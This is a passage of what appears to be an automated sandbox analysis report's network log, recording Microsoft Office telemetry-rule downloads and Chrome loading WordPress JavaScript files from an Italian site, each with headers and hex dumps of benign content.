                                                                                                                                          Data Ascii: PNGIHDR*kpHYsiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:R
                                                                                                                                          2024-11-28 10:33:16 UTC2497INData Raw: 69 52 f1 27 1a 2b f8 75 e5 7c cc d9 b1 96 9e e7 60 a9 0d 62 40 9b a2 df 56 a0 ee d1 c0 66 70 ce 24 80 f5 6d d9 85 fe ad 65 a5 3d 20 32 6a 74 b9 58 de 02 c4 7a f7 c0 19 42 c1 6d 41 1d 6c 91 df c6 52 6b a0 26 f7 5c de 7b 24 7a d5 69 41 a7 9e 0e c4 9c 21 16 3c 1c b1 0f ee 21 9e 58 70 0d c0 e7 6e c5 e2 ea 83 db 68 e8 56 99 52 55 cd 7f af 39 8d 80 3a 96 41 bf c1 b0 d4 e6 47 5c da ed 57 b3 a5 26 a0 de 43 a8 7d aa 34 b8 38 69 05 5c 72 e6 c5 6b 02 d8 db 04 dc 25 f3 16 a4 cc 4d 8b d6 97 9a d8 1d 8f 49 df 4e 6a e9 09 ef fa ed 70 f2 e6 15 3c 7c f5 0c 55 5c 4a c2 35 97 33 42 ff 3a 88 4e 2b 67 40 7d 83 8d a4 3f 34 aa ad 45 bc b5 e8 b9 29 f9 e4 1f b5 bc 75 a3 83 4f 2d d8 aa 86 bb ce d5 74 de ef 81 2b d1 94 f8 c4 df 72 9c 8f bd 8c aa bd da 50 2d 7f 6c 79 38 4a 17 29 ee
                                                                                                                                          Data Ascii: iR'+u|`b@Vfp$me= 2jtXzBmAlRk&\{$ziA!<!XpnhVRU9:AG\W&C}48i\rk%MINjp<|U\J53B:N+g@}?4E)uO-t+rP-ly8J)


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          123192.168.2.44988713.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:15 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:16 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 478
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                          ETag: "0x8DC582B9B233827"
                                                                                                                                          x-ms-request-id: 48138194-301e-0020-3858-406299000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103316Z-174f78459685m244hC1EWRgp2c0000000y20000000008ht8
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:16 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          124192.168.2.44988813.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:16 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:16 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 404
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                          ETag: "0x8DC582B95C61A3C"
                                                                                                                                          x-ms-request-id: e52ede4a-001e-0017-0591-3f0c3c000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103316Z-174f7845968xlwnmhC1EWR0sv80000000y7g0000000017vc
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:17 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          125192.168.2.44988913.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:16 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:16 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 468
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                          ETag: "0x8DC582BB046B576"
                                                                                                                                          x-ms-request-id: be7987d0-001e-0034-1e91-3fdd04000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103316Z-174f78459685726chC1EWRsnbg0000000y8g000000008r5s
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:17 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          126192.168.2.44989013.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:17 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:17 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 400
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                          ETag: "0x8DC582BB2D62837"
                                                                                                                                          x-ms-request-id: 6760f0bc-801e-002a-1f91-3f31dc000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103317Z-174f7845968j6t2phC1EWRcfe80000000ybg000000009v9t
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:17 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          127192.168.2.4498915.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:17 UTC418OUTGET /wp-content/plugins/tailor/assets/js/dist/vendor/modernizr.min.js?ver=1.8.2 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:17 UTC315INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:17 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 13 Mar 2018 12:53:50 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 5504
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:17 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:17 UTC5504INData Raw: 2f 2a 21 20 6d 6f 64 65 72 6e 69 7a 72 20 33 2e 33 2e 31 20 28 43 75 73 74 6f 6d 20 42 75 69 6c 64 29 20 7c 20 4d 49 54 20 2a 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6d 6f 64 65 72 6e 69 7a 72 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 2f 3f 2d 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 2d 63 73 73 74 72 61 6e 73 66 6f 72 6d 73 2d 63 73 73 74 72 61 6e 73 66 6f 72 6d 73 33 64 2d 63 73 73 74 72 61 6e 73 69 74 69 6f 6e 73 2d 70 72 65 66 69 78 65 64 2d 73 65 74 63 6c 61 73 73 65 73 20 21 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 6e 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 65 3d 3d 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 76 61 72 20 65 2c 6e 2c 74 2c 73 2c 69 2c 6f 2c 61 3b 66 6f 72 28 76 61 72 20 66
                                                                                                                                          Data Ascii: /*! modernizr 3.3.1 (Custom Build) | MIT * * https://modernizr.com/download/?-cssanimations-csstransforms-csstransforms3d-csstransitions-prefixed-setclasses !*/!function(e,n,t){function r(e,n){return typeof e===n}function s(){var e,n,t,s,i,o,a;for(var f


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          128192.168.2.44988513.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:17 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:17 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 423
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                          ETag: "0x8DC582BB7564CE8"
                                                                                                                                          x-ms-request-id: dc0e6055-901e-005b-2d91-3f2005000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103317Z-174f7845968px8v7hC1EWR08ng0000000yp00000000011p8
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:18 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          129192.168.2.44989213.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:17 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:18 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 479
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                          ETag: "0x8DC582BB7D702D0"
                                                                                                                                          x-ms-request-id: 8dfbf447-101e-0028-0f8e-3f8f64000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103318Z-174f7845968frfdmhC1EWRxxbw0000000y8g000000008ktr
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:18 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          130192.168.2.44989413.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:18 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:19 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 475
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                          ETag: "0x8DC582BB2BE84FD"
                                                                                                                                          x-ms-request-id: fac49ef3-501e-008f-0a91-3f9054000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103319Z-174f7845968xr5c2hC1EWRd0hn0000000f1g000000009dnx
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:19 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          131192.168.2.44989313.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:18 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:19 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 425
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                          ETag: "0x8DC582BBA25094F"
                                                                                                                                          x-ms-request-id: d2a0c1bd-101e-0017-761b-4147c7000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103319Z-174f784596886s2bhC1EWR743w0000000y9g000000007198
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:19 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          132192.168.2.4498965.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:19 UTC388OUTGET /wp-includes/js/imagesloaded.min.js?ver=4.1.4 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:19 UTC315INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:19 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Mon, 02 Nov 2020 09:05:06 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 5629
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:19 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
